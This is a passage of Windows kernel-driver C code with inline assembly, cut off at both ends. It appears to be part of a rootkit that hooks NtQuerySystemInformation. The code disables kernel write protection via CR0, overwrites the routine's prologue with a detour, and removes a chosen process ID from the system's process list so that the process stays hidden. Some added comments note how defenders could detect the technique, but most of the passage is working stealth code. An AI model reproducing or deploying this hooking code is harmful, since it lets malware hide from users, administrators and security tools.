bsp; } Status = RepairNtosFile( (DWORD)OldExEnumHandleTable, (DWORD)(&CrackCodeExEnumHandleTable) );
return Status; }
//-----------------------------------------------------------------------
// NewNtQuerySystemInformation
//
// Detour body that PatchNtQuerySystemInformation installs over the first
// six bytes of NtQuerySystemInformation (CrackCode... = 0x68 <push imm32>
// of this function's address; the saved original six bytes live in
// ResumCodeNtQuerySystemInformation).  Control arrives here whenever the
// patched routine is entered, with the same arguments as the original.
//
// Behaviour visible in this block:
//   1. Write the saved original bytes back over the hooked prologue, so the
//      real routine can be called.
//   2. Call the real NtQuerySystemInformation.
//   3. Re-apply the six-byte patch.
//   4. If the call succeeded and the class is 5 (SystemProcessInformation),
//      walk the returned SYSTEM_PROCESS_INFORMATION list and unlink the
//      entry whose process id equals the global ProtectID by adjusting the
//      previous entry's NextEntryOffset.
//
// Defender notes (for detection / analysis of this technique):
//   * The exported function's prologue no longer matches the on-disk image
//     except during the narrow window of step 2; a kernel-code integrity
//     check comparing the first bytes of NtQuerySystemInformation against
//     the image will observe the 0x68 push-immediate byte.
//   * Writing into kernel text here (mov [edi], ...) only succeeds while
//     CR0.WP is clear; PatchNtQuerySystemInformation clears it, and no
//     restore is visible in this block -- whether WP stays disabled for the
//     lifetime of the hook is not shown here and should be confirmed.
//   * Field offsets are hard-coded for the 32-bit SYSTEM_PROCESS_INFORMATION
//     layout (NextEntryOffset at +0, UniqueProcessId at +0x44).
//
// Returns: the NTSTATUS produced by the original routine, unchanged.
//-----------------------------------------------------------------------
NTSTATUS NewNtQuerySystemInformation(
    IN ULONG SystemInformationClass,
    OUT PVOID SystemInformation,
    IN ULONG SystemInformationLength,
    OUT PULONG ReturnLength OPTIONAL )
{
    NTSTATUS Status;
    DWORD Bprocess;     // address of the list entry preceding the one under inspection

    // Step 1: restore the original prologue (dword at +0, word at +4) so the
    // real routine can execute from its entry point.
    _asm {
        pushad
        mov edi, OldNtQuerySystemInformation
        mov eax, dword ptr ResumCodeNtQuerySystemInformation[0]
        mov [edi], eax                                  // original bytes 0..3
        mov ax, word ptr ResumCodeNtQuerySystemInformation[4]
        mov [edi+4], ax                                 // original bytes 4..5
        popad
    }

    // Step 2: forward the call to the unpatched routine.
    Status=OldNtQuerySystemInformation (
        SystemInformationClass,
        SystemInformation,
        SystemInformationLength,
        ReturnLength OPTIONAL );

    // Step 3: re-install the six patch bytes (push <NewNtQuerySystemInformation> ...).
    _asm {
        pushad
        mov edi, OldNtQuerySystemInformation
        mov eax, dword ptr CrackCodeNtQuerySystemInformation[0]
        mov [edi], eax
        mov ax, word ptr CrackCodeNtQuerySystemInformation[4]
        mov [edi+4], ax
        popad
    }

    // Only a successful SystemProcessInformation (class 5) query is filtered;
    // every other class/status is passed through untouched.
    if ( Status != STATUS_SUCCESS || SystemInformationClass!=5 )
    {
        return Status;
    }

    // Step 4: unlink the entry whose UniqueProcessId == ProtectID.
    //   ecx      = ProtectID (pid to hide)
    //   edi      = current entry in the SystemInformation buffer
    //   Bprocess = address of the entry before edi (its NextEntryOffset is rewritten)
    _asm {
        pushad
        mov ecx, ProtectID
        mov edi, SystemInformation

    ProcessListNEnd:
        mov Bprocess, edi                               // remember predecessor
        mov eax, [edi]                                  // eax = NextEntryOffset
        test eax, eax
        jz ProcessListEnd                               // offset 0 terminates the list
        add edi, eax                                    // edi = next entry
        mov eax, [edi+0x44]                             // eax = UniqueProcessId (x86 layout)
        cmp eax, ecx
        jz FindOut
        jmp ProcessListNEnd

    FindOut:
        mov ebx, [edi]                                  // ebx = matched entry's NextEntryOffset
        test ebx, ebx
        jz listend                                      // matched entry is the last one
        mov eax, Bprocess
        mov edx, [eax]
        add ebx, edx
        mov [eax], ebx                                  // prev->NextEntryOffset += matched->NextEntryOffset
        jmp hideOK

    listend:
        mov eax, Bprocess
        mov [eax], 0                                    // prev becomes the terminator
                                                        // NOTE(review): no operand size on this store --
                                                        // confirm the assembler resolves it to a dword
    hideOK:
    ProcessListEnd:
        popad
    }

    return Status;
}
NTSTATUS PatchNtQuerySystemInformation () { NTSTATUS Status; OldNtQuerySystemInformation = (NTQUERYSYSTEMINFORMATION) GetFunctionAddr(L"NtQuerySystemInformation");
if ( OldNtQuerySystemInformation == NULL ) { DbgPrint("Get NtQuerySystemInformation Addr Error!!"); return STATUS_DEVICE_CONFIGURATION_ERROR; }
_asm //关中断 { CLI MOV EAX, CR0 AND EAX, NOT 10000H MOV CR0, EAX } _asm { pushad //获取 NtQuerySystemInformation 函数的地址并保留该函数的起始六个字节 mov edi, OldNtQuerySystemInformation mov eax, [edi] mov dword ptr ResumCodeNtQuerySystemInformation[0], eax mov ax, [edi+4] mov word ptr ResumCodeNtQuerySystemInformation[4], ax //构造要替换的代码,使得系统调用该函数时跳到我们构造的NewNtQuerySystemInformation去执行 mov byte ptr CrackCodeNtQuerySystemInformation[0], 0x68 lea edi, NewNtQuerySystemInformation mov dword ptr CrackCodeNtQuerySystemInformation[1], edi mov byte ptr CrackCodeNtQuerySystemInforma